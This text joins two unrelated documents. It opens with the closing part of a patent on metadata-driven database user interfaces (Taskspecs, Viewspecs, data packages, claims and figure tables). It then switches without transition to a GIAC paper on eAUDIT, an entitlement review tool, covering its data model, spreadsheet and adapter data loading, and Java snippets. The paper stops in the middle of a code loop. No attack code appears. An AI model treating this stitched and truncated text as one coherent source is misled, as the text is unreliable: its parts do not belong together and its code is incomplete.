In some embodiments, working on one Data Package 150 may result in the creation of new, lower level Data Packages 150. For example, a user 99 editing the data 10' for System 1 may identify that System 1 contains two subordinate Data Packages - Subsystem 1.1 and Subsystem 1.2. These subordinate Data Packages are automatically created by the TaskSpec 13 using data recorded in the "completion behaviors" elements 205 of the Taskspec.
The Completion Behavior element 205 comprises instructions in the form of a structured list of Entity Types 15 (e.g., Assembly XYZ) and associated Data Package Types 94. The instructions create a new, subordinate Data Package 150' with the specified Data Package Type 94 for each new instance of the specified Entity Type 15 created in the parent Data Package 150. For example, the completion behavior 205 for a "Create System" Taskspec 13 could include:
"Entity Type 15: Subsystem, Associated Data Package Type: Subsystem DP,"
"Entity Type: Element, Associated Data Package Type: Element DP."
These instructions indicate that a "System" may contain either Subsystems or Elements as subordinate data that should be mapped into new Data Packages 150'.
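The completion behavior above can be sketched as a simple mapping from entity type to the data package type to create. The function and names below are illustrative assumptions, not the Taskspec's actual interface.

```python
# Sketch of a "completion behavior": for every new instance of a listed
# entity type created in a parent data package, a subordinate data
# package of the associated type is created. Mapping mirrors the
# "Create System" example in the text.
COMPLETION_BEHAVIOR = {
    "Subsystem": "Subsystem DP",
    "Element": "Element DP",
}

def apply_completion_behavior(new_instances, behavior=COMPLETION_BEHAVIOR):
    """Return the subordinate data packages to create for the given
    (entity_type, instance_name) pairs; unlisted types are ignored."""
    packages = []
    for entity_type, instance_name in new_instances:
        if entity_type in behavior:
            packages.append({
                "data_package_type": behavior[entity_type],
                "name": instance_name,
            })
    return packages

created = apply_completion_behavior([
    ("Subsystem", "Subsystem 1.1"),
    ("Subsystem", "Subsystem 1.2"),
    ("Function", "Fuel delivery"),   # not listed -> no new package
])
print(len(created))  # 2
```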
The above steps allow a domain expert to create a complex user interface that is tailored to their specific data subset domain 151 within a database 10' without the need to write new software. The results of the preceding steps of the method 200 are recorded into a predefined metadata structure and an administrative data structure 19 that are then interpreted by generic software 61 executing on a processor 60 to produce domain specific pages of the GUI 80.
FIG. 6 is an exemplary GUI 80 that may be used to create a Viewspec 11 by a user 99. After establishing all of the data definitions discussed above required to support a Viewspec 11, the Viewspec can be built by associating these data definitions. The GUI 80 allows the user 99 to pick a data definition at a first level and then select a subsequent data definition that can be linked with the first data definition such that the second data definition acts as a sub-query for the first data definition. The constructed Viewspec 11 can then be named and stored for future use.
As can be seen from inspection of FIG. 6, the first level of inquiry/report is "VS-1 Symptoms." The second or subordinate level of inquiry is data concerning symptoms and those failure modes that cause the symptoms. An additional second level of inquiry concerns the interactive tests for those symptoms that cause the failure modes. The Viewspec does not contain or store data in any of the underlying application database tables 10'. The data for the data definitions is a subset of the application data in database 10. The Viewspec 11 prospects for pieces of information from different existing tables that are pertinent only to the user's Data Package 150 and Work Package 92.
At process 315 the database 10 is searched for "Corrective Action" 86 and "FM has Interactive Tests" 88. While an exemplary embodiment or exemplary embodiments are presented in the foregoing detailed description of the invention, it should be appreciated that a vast number of variations exist. It should also be appreciated that the exemplary embodiment or exemplary embodiments are only examples, and are not intended to limit the scope, applicability, or configuration of the invention in any way. Rather, the foregoing detailed description will provide those skilled in the art with a convenient road map for implementing an exemplary embodiment of the invention, it being understood that various changes may be made in the function and arrangement of elements described in an exemplary embodiment without departing from the scope of the invention as set forth in the appended claims.
Claims
1. A computer executed method for creating a complex graphical user interface on a display device via generic computer readable database software executable on a processor to manage only a specific data subset domain of application data in a database, the method comprising:
creating metadata defining a specific data subset domain, the metadata including a report specification and a view specification;
defining attribute metadata, entity metadata and relationship metadata for the specific data subset domain;
specifying a data package specification for the specific data subset domain;
specifying a data package hierarchy within the specific data subset domain;
specifying a view specification for the user group;
associating the view specification with the report specification; and
releasing the generic software application to a user.
2. The method of claim 1, wherein creating metadata includes defining a task specification, a task specification comprising a subset of the metadata that controls a sequence of steps performed by the processor that provides the application data from the database for a work package that is defined by a work package specification.
3. The method of claim 2, wherein a work package specification is a subset of the metadata that specifies the view specification and task specification for the processor that will be used to create the work package.
4. The method of claim 1, wherein the metadata defining a data subset domain comprises definitions for all entity types, attribute types, relationship types and primary keys for the application data being displayed.
5. The method of claim 1, wherein the entity metadata comprises a table name, a primary key and a long name.
6. The method of claim 1, wherein the Relationship metadata comprises a source entity type, a destination entity type, a forward name, a reverse name and cardinality rules.
7. The method of claim 1, wherein the attribute metadata comprises an entity name, an attribute name, a display name, an attribute type, an attribute editor and constraints.
8. A computer program product recorded on a non-transitory storage medium comprising steps for creating a complex graphical user interface on a display device via generic computer readable database software to manage only a specific data subset domain of application data in a database, the steps comprising:
- creating metadata defining a specific data subset domain, the metadata including a report specification and a view specification;
- defining attribute metadata, entity metadata and relationship metadata for the data subset domain;
- specifying a data package specification for the specific data subset domain;
- specifying a data package hierarchy within the specific data subset domain;
- specifying a user group for the specific data subset domain;
- specifying a view specification for the user group;
- associating the view specification with the report specification; and
- releasing the generic computer readable database software to a user.
FIG. 4
## TASKS (Aka Task Network)
<table>
<thead>
<tr>
<th>PRODUCT NAME</th>
<th>WORK PACKAGE NAME</th>
</tr>
</thead>
<tbody>
<tr>
<td>BASELINE</td>
<td>DEFINE SYSTEMS</td>
</tr>
<tr>
<td>SYSTEM 1</td>
<td>DEFINE SUBSYSTEMS FOR SYSTEM 1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.1</td>
<td>DEFINE ELEMENTS FROM SUBSYSTEM 1.1</td>
</tr>
<tr>
<td>ELEMENT 1.1.1</td>
<td>DEFINE DATA FOR ELEMENT 1.1.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.1</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 1.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.2</td>
<td>DEFINE ELEMENTS FROM SUBSYSTEM 1.2</td>
</tr>
<tr>
<td>ELEMENT 1.2.1</td>
<td>DEFINE DATA FOR ELEMENT 1.2.1</td>
</tr>
<tr>
<td>ELEMENT 1.2.1</td>
<td>DEFINE DATA FOR ELEMENT 1.2.1</td>
</tr>
<tr>
<td>SUBSYSTEM 1.2</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 1.2</td>
</tr>
<tr>
<td>SYSTEM 1</td>
<td>AUDIT AND FINALIZE DATA FOR SYSTEM 1</td>
</tr>
<tr>
<td>SYSTEM 2</td>
<td>DEFINE SUBSYSTEMS FOR SYSTEM 2</td>
</tr>
<tr>
<td>SUBSYSTEM 2.1</td>
<td>DEFINE ELEMENTS FOR SUBSYSTEM 2.1</td>
</tr>
<tr>
<td>ELEMENT 2.2.1</td>
<td>DEFINE DATA FOR ELEMENT 2.2.1</td>
</tr>
<tr>
<td>ELEMENT 2.2.1</td>
<td>DEFINE DATA FOR ELEMENT 2.2.1</td>
</tr>
<tr>
<td>SUBSYSTEM 2.1</td>
<td>AUDIT AND FINALIZE DATA FOR SUBSYSTEM 2.1</td>
</tr>
<tr>
<td>SYSTEM 2</td>
<td>AUDIT AND FINALIZE DATA FOR SYSTEM 2</td>
</tr>
<tr>
<td>BASELINE</td>
<td>AUDIT AND FINALIZE DATA FOR BASELINE</td>
</tr>
<tr>
<td>BASELINE</td>
<td>PUBLISH OUTPUT REPORTS AND DATA SETS</td>
</tr>
</tbody>
</table>
**FIG. 5**
<table>
<thead>
<tr>
<th>DELETE</th>
<th>MAIN REPORT</th>
<th>SUB-REPORT</th>
<th>MAIN REPORT ATTRIBUTE</th>
<th>SUB-REPORT ATTRIBUTE</th>
<th>LEVEL</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>VS1 - SYMPTOMS</td>
<td>✔</td>
<td>SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>SYMPTOM</td>
</tr>
<tr>
<td>✔</td>
<td>VS1 - SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>VS1-FM HAS CORRECTIVE ACTIONS</td>
<td>✔</td>
<td>FAILURE MODE</td>
</tr>
<tr>
<td>✔</td>
<td>VS1 - SYMPTOM CAUSES FAILURE MODES</td>
<td>✔</td>
<td>VS1-HAS INTERACTIVE TESTS</td>
<td>✔</td>
<td>FAILURE MODE</td>
</tr>
</tbody>
</table>
VIEWSPEC NAME: TIMS VIEW SPEC
ADD REPORT | MODIFY VIEWSPEC | COPY VIEWSPEC | CANCEL
The below are the reports used in the view spec. Click to modify them:
- VS1-SYMPTOMS
- VS1-FM HAS CORRECTIVE ACTIONS
- VS1-FM HAS INTERACTIVE TESTS
- VS1-SYMPTOM CAUSES FAILURE MODES
Create new report
**FIG. 6**
eAUDIT: Designing a generic tool to review entitlements
GIAC (GCC) Gold Certification
Author: François Bégin, francois.begin@telus.com
Advisor: Dr. Ray Davidson
Accepted: June 15th 2015
Abstract
In a perfect world, identity and access management would be handled in a fully automated way. On their first day of work, new employees would receive all the required access to the systems they need in order to perform their job function. Over time, as their roles within the company evolved, these entitlements would be automatically adjusted. Unfortunately, we do not live in a perfect world. Access to systems is often cumulative, with employees keeping access they no longer require. This in turn poses a risk to the enterprise: unneeded access can lead to abuses and increases the possibility of data leakage if an employee is social engineered. This paper proposes a system to help address this problem: eAUDIT is a custom-built, generic entitlement review system that can simplify the task of reviewing user entitlements. eAUDIT is well suited to cases where no such tool exists in an enterprise, but can also complement an identity management system that does not fully cover all systems and applications. This paper covers the design of eAUDIT as well as an overview of its implementation, including sample code.
Доверяй, но проверяй
Trust, but verify
Russian proverb
Special thanks to my A-Team of coders, Kobe Lin and Jaya Balasubramaniam, who made eAUDIT happen.
1. Introduction
When a new employee joins a company, he should be automatically provided an identity within this company as well as various methods to authenticate himself. These authentication methods can take various forms: a physical access badge, a centrally-managed username and password, a virtual smart card carrying a cryptographically signed certificate, etc. Once an identity has been established for the new employee, this identity should be automatically associated with all the access entitlements he requires to perform his job functions. From that point on, as the employee progresses in his career, it is fairly likely that he will change teams, roles and positions. At every such milestone, his entitlements should be automatically re-adjusted, ensuring that he always has the access he requires. This will ensure that the employee’s access is limited to the resources he requires, a key element of a good authorization policy (Ballad, Ballad, and Banks, 2010).
This, of course, is an idealized description of Identity and Access Management (IAM), which is of great value to any enterprise. But IAM can be challenging. As Mather, Kumaraswamy and Latif (2009) aptly pointed out, “Many of these [IAM] initiatives are entered into with high expectations, which is not surprising given that the problem is often large and complex.”
This is particularly true for organizations that have grown through mergers and acquisition, as well as for organizations that have existed for decades and rely on legacy systems. Building IAM hooks (if that is even an option) into these systems can be costly or complicated. Sometimes, the best approach is to retain existing entitlements and address any access management gaps by conducting regular reviews of these entitlements to prune the ones that are no longer required.
Building a system that can conduct regular entitlement reviews is in itself a significant project, best handled by following a software development life cycle model. As part of the pre-development activities, one element of the discussion will invariably touch upon whether to develop the software functions in-house, outsource them, get an off-the-shelf package, or adapt and reuse existing software (Saleh, 2009). While there are commercial products that can help conduct reviews of entitlements, these tools are often
tied to large, costly products related to both IAM and Governance, Risk and Compliance (GRC) management. This paper chooses the first path: a custom-built solution. The main argument in favor of this choice is that, with a suitably clear scope, such a tool can be built and deployed at limited cost and provide a quick and significant benefit to an enterprise that does not have this capability. The tool presented here is called eAUDIT and can achieve a simple goal of providing a custom-made solution for entitlement review. The scope, design and high-level implementation of this tool are covered in this paper.
2. eAUDIT
2.1. Defining the elements of an entitlement audit
Prior to diving into the main topic, some of the key words that will be used throughout this paper need to be clearly defined.
In this paper, an entitlement refers to a privilege that has been granted to a user. Typical examples of entitlements include authorization to access a particular software application/data source, privileged access to a system or application, etc. Note that entitlements are granular: if a specific system has different levels of access, e.g. read access vs. read/write access, each of these counts as a separate entitlement. The goal of an audit is to determine whether or not the entitlement is still valid.
An authorizer is defined as the person (or persons) who can grant someone a specific entitlement. In many organizations, managers often take on that role for their direct reports. This is supported by the fact that managers are well positioned to assess the business needs related to this type of access. Security professionals who may wish for more access control enforcements should be reminded that “Business will always trump security […]” (Kadrich, 2007). With that said, a manager is not always the main authorizer, as some systems have a specific business owner who plays that role.
Entitlements are granted to entities. In most cases, an entity will simply be an employee of the company, but since the goal of eAUDIT is to create a system that is purely generic, the word 'entity' is used instead. For instance, an audit could be conducted against physical access cards that are not associated directly with a user, e.g.
generic access cards for escorted access that are left in the care of the security guard desk. These cards are a good example of a business need (convenience of being able to provide quick access to vendors on support calls) that outweighs security concerns (difficulty in associating a specific user to these cards).
One of the key elements of eAUDIT is its generic nature. Entities can be anything and the various characteristics that these entities possess can also be anything. In the previous example, badge entities can have attributes such as: Badge ID, Badge Label, Manager (if applicable), Badge Type, Expiry Date, etc., as shown in Table 1.
<table>
<thead>
<tr>
<th colspan="2"><strong>Primary attributes</strong></th>
<th colspan="3"><strong>Secondary attributes</strong></th>
</tr>
<tr>
<th>Badge ID</th>
<th>Badge Label</th>
<th>Manager (if applicable)</th>
<th>Badge Type</th>
<th>Expiry Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>1000000</td>
<td>Penny Robinson</td>
<td></td>
<td>Employee badge</td>
<td>2020-01-01</td>
</tr>
<tr>
<td>1000001</td>
<td>Guard Desk</td>
<td></td>
<td>Generic cards</td>
<td>2015-12-31</td>
</tr>
</tbody>
</table>
Table 1. Mockup data for an audit of physical access badges.
In another example such as Table 2, where entities are defined as employees, the attributes of these employees would be different: Employee ID, First Name, Last Name, Title, Computer ID, City, etc.
<table>
<thead>
<tr>
<th colspan="4"><strong>Primary attributes</strong></th>
<th colspan="2"><strong>Secondary attributes</strong></th>
</tr>
<tr>
<th>Employee ID</th>
<th>First Name</th>
<th>Last Name</th>
<th>Title</th>
<th>Computer ID</th>
<th>City</th>
</tr>
</thead>
<tbody>
<tr>
<td>200002</td>
<td>Don</td>
<td>West</td>
<td>Pilot</td>
<td>LX73-26</td>
<td>Toronto</td>
</tr>
<tr>
<td>200003</td>
<td>Judy</td>
<td>Robinson</td>
<td>Zoologist</td>
<td>LD04-34</td>
<td>Edmonton</td>
</tr>
</tbody>
</table>
Table 2. Mockup data for an audit of employees.
eAUDIT users are those individuals responsible for conducting audits based on any type of entities and/or attributes. Giving eAUDIT users the ability to define their own attributes to meet their needs is crucial. In eAUDIT, entity attributes are therefore referred to as user-defined entity attributes (UDEA). Furthermore, a distinction is made between primary attributes and secondary attributes. Primary attributes are those that normally suffice for an authorizer to complete an entitlement review. Secondary attributes contain extra information that an authorizer may need to consult to make a final
François Bégin, francois.begin@telus.com
determination. How these attributes are presented to authorizers will prove important when discussing the creation of the web interface for the audit engine.
### 2.2. Scope
Since eAUDIT is a custom-built design and implementation project, one of the most important aspects of this project is to provide a clear scope. This will avoid *scope creep*, which is one of the top five reasons why a project can fail (Doraiswamy and Shiv, 2012).
The main elements of eAUDIT’s scope are:
- Import generic data by relying on user-defined entity attributes.
- Present a simple landing page to authorizers, showing them active audits that need their attention.
- Present a simple entitlement review page where all entities are listed in a sortable/filterable data table. The data table will show the primary entity attributes (always) and secondary attributes (on demand) to the authorizer.
- Conduct entitlement review based on binary responses (confirm | revoke) through a single click for each entity.
- Support for multiple authorizers for any given entitlement.
- Ability to group similar entitlements together.
The last point is important to clarify: in eAUDIT, a given audit can cover more than one entitlement, provided that all entities have the same attributes. For example, consider Table 3, a mockup of the entitlement review page presented to an authorizer:
In this particular audit, John Robinson is responsible for three different entitlements: *R* Main Data Center, *R* DR Site and *R* Wire Center. Since all these entitlements are similar in nature – and since they all relate to the same type of entities with the same attributes (badges granting physical access to buildings) – they are all part of the same meta-audit. Section 2.5 will discuss how the web interface will support the authorizers who are faced with multiple entitlements to review.
When entities and their attributes are loaded at the start of an audit, they are locked-in for the duration of the audit. This is an important design decision that warrants some additional explanation: after all, if we are reviewing administrative access to company-issued laptops, should users be added and removed from the audit if they are granted those rights while the audit is taking place?
Although this may appear to provide a more accurate representation of the data, the complications associated with auto-adjusting the dataset greatly outweigh the benefits of a locked-in audit. In some cases, data will be loaded in eAUDIT through a spreadsheet. Re-creating the spreadsheet throughout the audit would be time-consuming, and additional code would be required to adjust the existing data to handle deltas. Furthermore, audits conducted by eAUDIT typically last 3-4 weeks. These short audit windows are another mitigating factor. Rather than capturing in-flight deltas, eAUDIT will strive for a high success rate and repeated audits throughout the year. With all of this said, if data is loaded dynamically inside eAUDIT through an adapter, then that adapter can be written to handle in-flight changes.
François Bégin, francois.begin@telus.com
2.3. Design
As previously alluded to, the design of eAUDIT (Figure 1) is fairly simple. At a high level, entitlement data needs to be acquired from various data sources, and then presented to authorizers for review. Section 2.4 covers data acquisition in more detail. How the data ends up in the database is critical. eAUDIT needs to handle generic data efficiently. Taking a page from Jurney (2013): “In choosing our tools, we seek linear scalability, but above all, we seek simplicity”, the data model for eAUDIT seeks simplicity. In Jurney’s case, he was referring to NoSQL big data tools, but his comment is just as applicable to a traditional SQL database. eAUDIT’s data is held in a SQL database, with a simple data model (see Appendix A). Let us consider the data model and go over some of the key characteristics.
The AuditTypeReference table (Figure 2) holds the base audit type information, such as the name and description of the audit, a start and end date, and some instructions. This is where the overall type of audit is defined: reviewing active contractors at TELUS, reviewing badges with *R* profiles attached, etc. Since TELUS is a bilingual company, various key fields are held in two separate fields (EN | FR), both of which are required by the web interface.
The AuditTypeReference table also holds the labels for the primary and secondary User Defined Entity Attributes (UDEA) fields. Initially, a pre-defined set of fields was considered, e.g. UDEAPrimaryField1, UDEAPrimaryField2, etc., but this imposed a hard limit and was less than esthetically pleasing from a data model perspective. Another approach considered was a mapping table that would hold as many of these user-defined fields as required, with a many-to-one relationship with the AuditTypeReference table. In the end though, a simple and elegant solution was chosen: the UDEA fields hold the labels in JSON format. Figure 3 shows examples of primary and secondary field labels for two different types of audits:
<table>
<thead>
<tr>
<th>AuditName</th>
<th>UDEAPrimaryFieldsEN</th>
<th>UDEASecondaryFieldsEN</th>
</tr>
</thead>
<tbody>
<tr>
<td>eSAM active contractors audit</td>
<td>['Emp ID', 'First Name', 'Last Name', 'SAP ID', 'Mgr ...']</td>
<td>['Contractor Type', 'Province', 'Vendor', 'Access']</td>
</tr>
<tr>
<td>Restricted profiles in data centers</td>
<td>['Emp ID', 'First Name', 'Last Name', 'Mgr ID', 'Mgr ...']</td>
<td>['Cards']</td>
</tr>
</tbody>
</table>
Figure 3. User-defined entity attributes fields for two different audits.
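As a minimal sketch of how such a label array could be produced before being stored in a UDEA field, consider the following. Note that the `UdeaLabels` class and `toJson` method are hypothetical helpers for illustration, not part of jEAUDITlibrary:

```java
import java.util.List;
import java.util.stream.Collectors;

// Hypothetical sketch: serialize user-defined field labels into the
// JSON-array string stored in fields such as UDEAPrimaryFieldsEN.
public class UdeaLabels {
    // Quote each label (escaping embedded quotes) and join into a JSON array literal.
    public static String toJson(List<String> labels) {
        return labels.stream()
                .map(l -> "\"" + l.replace("\"", "\\\"") + "\"")
                .collect(Collectors.joining(", ", "[", "]"));
    }

    public static void main(String[] args) {
        String json = toJson(List.of("Emp ID", "First Name", "Last Name"));
        System.out.println(json); // ["Emp ID", "First Name", "Last Name"]
    }
}
```

A JSON library such as Jackson or Gson would normally handle this serialization; the hand-rolled join above simply makes the stored format explicit.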
Table Audit (Figure 4) defines the actual entitlements being reviewed within an audit type. It also has a count of the total number of entities that bear each entitlement.
Using our previous example of restricted profiles on access badges, this table would hold all the different types of restricted profiles that are to be reviewed (Figure 5). The table uses a foreign key to link itself to the AuditTypeReference table. It is the relationship between Audit and AuditTypeReference that allows eAUDIT to group similar entitlement reviews together.
<table>
<thead>
<tr>
<th>idAudit</th>
<th>TotalNumberOfEntities</th>
<th>Entitlement</th>
<th>CreatedDateTime</th>
<th>CreatedBy</th>
</tr>
</thead>
<tbody>
<tr>
<td>2006</td>
<td>52</td>
<td>"R" Main Data Center</td>
<td>2015-04-23 03:30:39</td>
<td>eAUDIT_BatchOps</td>
</tr>
<tr>
<td>2008</td>
<td>35</td>
<td>"R" DR Site</td>
<td>2015-04-23 03:30:39</td>
<td>eAUDIT_BatchOps</td>
</tr>
<tr>
<td>2009</td>
<td>47</td>
<td>"R" Wire Center</td>
<td>2015-04-23 03:30:40</td>
<td>eAUDIT_BatchOps</td>
</tr>
</tbody>
</table>
Figure 5. Different entitlements reviewed within the same audit.
The Entities table (Figure 6) is the one that holds a list of who (or what) was granted entitlements. This is where the UDEAprimaryFields and UDEAsecondaryFields from the AuditTypeReference table will find their counterparts, called UDEAprimaryFieldsValues and UDEAsecondaryFieldsValues respectively.
The values are saved in JSON format (see Figure 7), just like the labels. The choice of JSON as a format to hold field values may appear a little strange at first. After all, flattening all entities’ attributes in a single field will make SQL searches more expensive. But the main goal of eAUDIT is not efficient searches. The goal is to efficiently present datasets for entitlement review. The choice of JSON to keep labels and values is directly related to the web interface that will allow authorizers to conduct their review – and having field values in this format will prove useful once we start discussing eAUDIT’s web implementation in section 2.5.

**Figure 6.** Entities table in the eAUDIT database.

**Figure 7.** User-defined field values as kept in the Entities table.
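Because the labels (in AuditTypeReference) and the values (in Entities) are stored as parallel arrays, reconstructing a displayable row amounts to zipping the two lists in order. A small illustrative sketch, with a hypothetical `UdeaZip` class that is not part of jEAUDITlibrary:

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Hypothetical sketch: pair UDEA labels (from AuditTypeReference) with the
// matching values (from Entities) for display, preserving column order.
public class UdeaZip {
    public static Map<String, String> zip(List<String> labels, List<String> values) {
        if (labels.size() != values.size()) {
            throw new IllegalArgumentException("label/value count mismatch");
        }
        Map<String, String> row = new LinkedHashMap<>(); // keeps column order
        for (int i = 0; i < labels.size(); i++) {
            row.put(labels.get(i), values.get(i));
        }
        return row;
    }

    public static void main(String[] args) {
        System.out.println(zip(List.of("Emp ID", "Full Name"),
                               List.of("123456", "Melia Hobel")));
        // {Emp ID=123456, Full Name=Melia Hobel}
    }
}
```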
The **EntitiesAuditResponses** table (Figure 8) holds the responses, i.e. whether the authorizer confirmed or revoked the entitlement. Keeping this data in a separate table allows for fields such as `LastUpdatedDateTime` and `LastUpdatedBy` to capture who reviewed the entitlement and when. Although mentioned here, note that the full implementation of this table’s functionality is not covered in this paper.
Finally, the **Authorizers** table (Figure 9) is where the authorizers of a particular Audit record are kept. This table has a many-to-one relationship to the Audit table, allowing multiple individuals to be named authorizers of a particular audit. TELUS uses a unique numerical value for its employee IDs, and this is reflected in field **AuthorizerEmpID**, which is defined as an integer value.
### 2.4. Data acquisition
Since eAUDIT is all about validating data, acquiring data is key to the tool. Not only that, but per the scope defined in section 2.2, data needs to be acquired as easily as possible. After all, if you cannot load authorizers, entitlements and entities into the eAUDIT database, you cannot review these records. To help with the acquisition of data, a Java library called **jEAUDITlibrary** was created (Figure 10).

As would be expected from any other Java library, jEAUDITlibrary contains classes for the main objects that are at the core of eAUDIT: *Audit, AuditTypeReference, Authorizers, Entities, and EntitiesAuditResponses*. These classes map to the data model (Appendix A) that was discussed in the previous section. There are also Util classes that contain static methods related to these objects: *AuditUtil, AuditTypeReferenceUtil, AuthorizersUtil, EntitiesUtil, and EntitiesAuditResponsesUtil*. The eAUDIT library relies on two external libraries: the standard MySQL Java connector and a toolbox library called UnifiedToolBoxV2, which is mostly used to help manage SQL connections as well as provide logging capabilities.
The source code for jEAUDITlibrary is available from the eAUDIT project page on GitHub ([https://github.com/francoisbegin/eAUDIT](https://github.com/francoisbegin/eAUDIT)). The project page also includes the source code for eAUDIT_BatchOps (Figure 11), a program that contains sample code to demonstrate data acquisition using the eAUDIT library. Appendix B gives a quick overview of how to set up an environment to use the library and eAUDIT_BatchOps.

Figure 11. Main classes of eAUDIT_BatchOps (supporting libraries not shown)
#### 2.4.1. Excel-driven data acquisition
The first demo in eAUDIT_BatchOps covers data import from an Excel spreadsheet. This particular section of the code relies heavily on Apache POI, an open-source Java API for Microsoft Documents (Apache Foundation, 2015). Note that all libraries required by eAUDIT_BatchOps are included with the project.
A demo spreadsheet, **dataLoadExample.xlsx**, is included with the eAUDIT_BatchOps project (Figure 12).

This spreadsheet holds three separate sheets: **AuditTypeRef** (Appendix C) contains all the data required to create the AuditTypeReference record in the eAUDIT database. **AuditData** (Appendix D) contains all the data required to create the Authorizers, Entities and Audit records. Finally, **Notes** contains notes to help users fill in the template correctly.
This spreadsheet can be used as a template for Excel-driven data loads. It is built to support generic data. To add/remove primary and secondary user-defined entity attribute fields, one only has to create/delete columns in the AuditData sheet and set the top row label to either **UDEAprimary** or **UDEAsecondary**.
Multiple authorizers per entitlement are supported by listing them in the Authorizers column, separated by semicolons. As mentioned in section 2.3, authorizers’ IDs are expected to be integer values that map to the TELUS employee ID of the authorizer. Using eAUDIT at a company that relies on non-numerical employee IDs would require modifications to the Authorizers class of jEAUDITlibrary.
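The semicolon-separated format described above could be parsed along these lines. This is a hypothetical stand-alone sketch, not the actual template-loader code:

```java
import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;

// Hypothetical sketch: parse the semicolon-separated Authorizers column of
// the AuditData sheet into integer employee IDs.
public class AuthorizerColumn {
    public static List<Integer> parse(String cell) {
        return Arrays.stream(cell.split(";"))
                .map(String::trim)
                .filter(s -> !s.isEmpty())
                .map(Integer::parseInt)   // non-numerical IDs would fail here
                .collect(Collectors.toList());
    }

    public static void main(String[] args) {
        System.out.println(parse("200001; 200002")); // [200001, 200002]
    }
}
```

The `Integer.parseInt` call makes the integer-ID assumption explicit: a company with alphanumeric employee IDs would need to relax it, as noted above.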
Method **Ops_ExcelDataLoader.loadFromExcelTemplate** handles the spreadsheet data load, provided it matches the expected template. To demonstrate this, one can create a new directory called **dataLoad** under the base path of eAUDIT and copy the demo spreadsheet to that location. One then compiles and runs eAUDIT_BatchOps with the **loadFromExcelTemplate** switch (or runs it with that switch inside a Java IDE):
In the example shown in Figure 13, a new AuditTypeReference record with id = 4 was created. Under that audit type reference, 5 sub-audits were created to match the 5 different entitlements that were defined in the spreadsheet (Figure 14), and 43 entities will need to be reviewed (Figure 15).

Figure 13. Loading data into eAUDIT using a spreadsheet.
Obviously, loading data from a spreadsheet is not ideal. Dealing with spreadsheets comes with pitfalls such as sensitive data exposure (Walsh, 2014). Still, spreadsheet imports may prove useful in cases where an application/system does not have a simple API to extract the data, or when a support team is reluctant to provide direct access to its data.
Another well-known reality is that, in many cases, spreadsheets are all that people know (Allen, 2015). Asking a subject-matter expert to do an export of the key data, and massaging these data to fit the eAUDIT Excel template might be the path of least resistance to acquire audit data.
#### 2.4.2. Adapter-driven data acquisition
A better solution than an Excel data load is to write an adapter to retrieve the audit data from a system. In its current incarnation, eAUDIT does not provide a generic interface for such adapters, but jEAUDITlibrary provides methods and classes to support their creation. Additionally, method Ops_AdapterDataLoad.loadFromAdapter() of eAUDIT_BatchOps demonstrates the implementation of a simple adapter.
The first step in building a custom adapter is to determine how the data can be acquired programmatically. In this case, each solution will likely be custom-built. For instance, TELUS has developed a custom adapter to interact with the Lenel Onguard physical access system. Data acquisition was achieved by the use of two database service accounts: one account to interact with Lenel Onguard to obtain a list of badges and access profiles, and another account to interact with the database where authorizers of these access profiles are maintained. The adapter simply correlates the two data sources and feeds the resulting data to the eAUDIT database.
For an adapter data load, one must refer back to the data model and note that the Audit table is at the heart of the model. Contrary to all other tables in the model, its primary key, idAudit, is not an auto-increment field. This was done on purpose, as it allows for the controlled creation of new records. When a custom adapter needs to send data to the eAUDIT database, it needs to determine the next available idAudit value. Then, each new entitlement is assigned the next idAudit value. As this list is built up, the list of corresponding Authorizers and Entities records can also be built.
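The id-selection step can be sketched as follows. In practice an adapter would obtain the current maximum with a query such as `SELECT MAX(idAudit) FROM Audit`, but the arithmetic is the same (the `NextAuditId` class is hypothetical):

```java
import java.util.Collection;
import java.util.List;

// Hypothetical sketch: since Audit.idAudit is not auto-increment, an adapter
// must pick the next free id itself, e.g. max(existing ids) + 1.
public class NextAuditId {
    public static int next(Collection<Integer> existingIds) {
        // Empty Audit table: start numbering at 1.
        return existingIds.stream().mapToInt(Integer::intValue).max().orElse(0) + 1;
    }

    public static void main(String[] args) {
        System.out.println(next(List.of(2006, 2008, 2009))); // 2010
    }
}
```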
If all of these records were written one at a time, data loads would be woefully slow. A custom-built adapter should therefore take a different approach. In the demo code proposed in method loadFromAdapter(), a HashMap is built as the code iterates through all entities. If it finds a new entitlement, it creates a new Audit record and attaches to it the authorizers for that entitlement and the entity record. If it finds an entitlement it already knows about, it retrieves it from the HashMap, increments field Audit.TotalNumberOfEntities, and adds the new entity to the previously correlated entities for that particular entitlement. All of this is done in memory, inside the HashMap. A special object called jEAUDITlibrary.AuditDataLoaderObject (Figure 16) is used to organize all the data:
```java
public class AuditDataLoaderObject {
    private int idAuditID;                           // idAudit value this object maps to
    private int idAuditTypeReference;                // parent AuditTypeReference record
    private Audit audit;                             // the Audit record itself
    private ArrayList<Authorizers> auditAuthorizers; // authorizers of this audit
    private ArrayList<Entities> auditEntities;       // entities under review
}
```
Figure 16. Fields for java class AuditDataLoaderObject.
This object is a meta-object, which can hold all the key data: idAudit, the corresponding Audit record, a list of Authorizers associated with the Audit record, and all entities for that particular audit. Once the HashMap has been fully populated, a simple call to method AuditDataLoaderObjectUtil.massLoad() handles batched writes to the database. Compiling eAUDIT_BatchOps and running it with the -loadFromAdapter switch demonstrates a simple adapter (Figure 17):
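The in-memory grouping described above can be illustrated with a simplified, self-contained sketch. The `AdapterGrouping` and `AuditAggregate` classes below are hypothetical stand-ins for the real AuditDataLoaderObject logic:

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical sketch of the grouping done by loadFromAdapter(): one
// aggregate per entitlement, collecting its entities before a batched write.
public class AdapterGrouping {
    // Simplified stand-in for jEAUDITlibrary.AuditDataLoaderObject.
    static class AuditAggregate {
        int totalNumberOfEntities;
        final List<String> entities = new ArrayList<>();
    }

    public static Map<String, AuditAggregate> group(List<String[]> rows) {
        Map<String, AuditAggregate> byEntitlement = new HashMap<>();
        for (String[] row : rows) {                 // row = {entitlement, entity}
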